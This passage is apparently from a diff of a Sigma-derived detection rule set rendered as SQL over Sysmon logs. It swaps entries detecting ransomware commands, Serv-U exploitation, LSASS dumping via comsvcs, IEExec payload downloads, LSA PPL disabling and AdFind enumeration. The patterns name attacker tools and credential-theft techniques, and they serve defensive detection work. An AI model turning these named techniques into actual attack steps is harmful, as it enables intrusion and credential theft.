Reg.EXE", - "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", + "title": "7Zip Compressing Dump Files", + "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. 
Often used by attacker to remove AV software services", + "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_delete_services.yml" + "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" }, { - "title": "Equation Group DLL_U Export Function Load", - "id": "d465d1d8-27a2-4cca-9621-a800f37cf72e", - "status": "stable", - "description": "Detects a specific export function name used by one of EquationGroup tools", + "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", + "id": "75578840-9526-4b2a-9462-af469a45e767", + "status": "test", + "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.g0020", - "attack.defense_evasion", - "attack.t1218.011" + "attack.persistence", + "attack.t1136.001", + "cve.2021.35211" ], "falsepositives": [ "Unlikely" ], 
"level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%-export dll\\_u%' ESCAPE '\\' OR (CommandLine LIKE '%,dll\\_u' ESCAPE '\\' OR CommandLine LIKE '% dll\\_u' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml" + "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - Process", - "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", + "title": "Conti Volume Shadow Listing", + "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects a command used by conti to find volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1587.001", + "attack.resource_development" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_uac_bypass_consent_comctl32.yml" + "filename": "proc_creation_win_malware_conti.yml" }, { - "title": "Potential Exploitation Attempt From Office Application", - "id": "868955d9-697e-45d4-a3da-360cefd7c216", + "title": "Rorschach Ransomware Execution Activity", + "id": "0e9e6c63-1350-48c4-9fa1-7ccb235edc68", "status": "experimental", - "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", - "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", + "description": "Detects Rorschach ransomware execution activity", + "author": "X__Junior (Nextron Systems)", "tags": [ "attack.execution", + "attack.t1059.003", + "attack.t1059.001", "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\') AND CommandLine LIKE '%11111111%' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" + "filename": "proc_creation_win_malware_rorschach_ransomware_activity.yml" }, { - "title": "Php Inline Command Execution", - "id": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", + "title": "System File Execution Location Anomaly", + "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", "status": "experimental", - "description": "Detects execution of php using the \"-r\" flag. This is could be used as a way to launch a reverse shell or execute live php code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a Windows program executable started from a suspicious folder", + "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Unknown" + "Exotic software" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\php.exe' ESCAPE '\\' OR OriginalFileName = 'php.exe') AND CommandLine LIKE '% -r%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\services.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsm.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR Image LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR Image LIKE '%\\\\dashost.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\consent.exe' ESCAPE '\\' OR Image LIKE '%\\\\defrag.exe' ESCAPE '\\' OR Image LIKE '%\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR Image LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Image LIKE '%\\\\winver.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonui.exe' ESCAPE '\\' OR Image LIKE '%\\\\userinit.exe' ESCAPE '\\' OR Image LIKE '%\\\\dwm.exe' ESCAPE '\\' OR Image LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program 
Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND Image LIKE '%\\\\wsl.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_php_inline_command_execution.yml" + "filename": "proc_creation_win_susp_system_exe_anomaly.yml" }, { - "title": "Suspicious Calculator Usage", - "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", - "status": "test", - "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", - "author": "Florian Roth (Nextron Systems)", + "title": "Use of VisualUiaVerifyNative.exe", + "id": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", + "status": "experimental", + "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate testing of Microsoft UI parts." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (Image LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VisualUiaVerifyNative.exe' ESCAPE '\\' OR OriginalFileName = 'VisualUiaVerifyNative.exe'))" ], - "filename": "proc_creation_win_susp_calc.yml" + "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml" }, { - "title": "Suspicious VBScript UN2452 Pattern", - "id": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", + "title": "Suspicious Microsoft Office Child Process", + "id": "438025f9-5856-4663-83f7-52f878a70a50", "status": "test", - "description": "Detects suspicious inline VBScript keywords as used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", + "author": "Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.execution", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%CreateObject%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\' AND CommandLine LIKE 
'%\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_unc2452_vbscript_pattern.yml" + "filename": "proc_creation_win_office_susp_child_processes.yml" }, { - "title": "Active Directory Structure Export Via Ldifde.EXE", - "id": "4f7a6757-ff79-46db-9687-66501a02d9ec", + "title": "Abusing IEExec To Download Payloads", + "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", "status": "experimental", - "description": "Detects the execution of \"ldifde.exe\" in order to export organizational Active Directory structure.", + "description": "Detects execution of the IEExec utility to download payloads", "author": "Nasreddine Bencherchali (Nextron 
Systems)", - "tags": [ - "attack.exfiltration" - ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND CommandLine LIKE '%-f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ldifde_export.yml" + "filename": "proc_creation_win_lolbin_ieexec_download.yml" }, { - "title": "Delete Important Scheduled Task", - "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", + "title": "LSA PPL Protection Disabled Via Reg.EXE", + "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.t1562.010" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR 
CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_delete.yml" + "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" }, { - "title": "Process Dumping Via Comsvcs.DLL", - "id": "646ea171-dded-4578-8a4d-65e9822892e3", - "status": "test", - "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", - "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", + "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", + "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "status": "experimental", + "description": "Detects active directory enumeration activity using known AdFind CLI flags", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1036", - "attack.t1003.001", - "car.2013-05-009" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Unlikely, because no one should dump the process memory in that way" + "Authorized administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' 
ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" + "filename": "proc_creation_win_pua_adfind_enumeration.yml" }, { - "title": "Execution Of Non-Existing File", - "id": "71158e3f-df67-472b-930e-7d287acaa3e1", + "title": "Potential WinAPI Calls Via CommandLine", + "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", "status": "experimental", - "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects the use of WinAPI Functions via the commandline. 
As seen used by threat actors via the tool winapiexec", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1106" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT (Image LIKE '%\\\\%' ESCAPE '\\') AND NOT ((Image = '') OR (Image IN ('-', '')) OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR 
CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_image_missing.yml" + "filename": 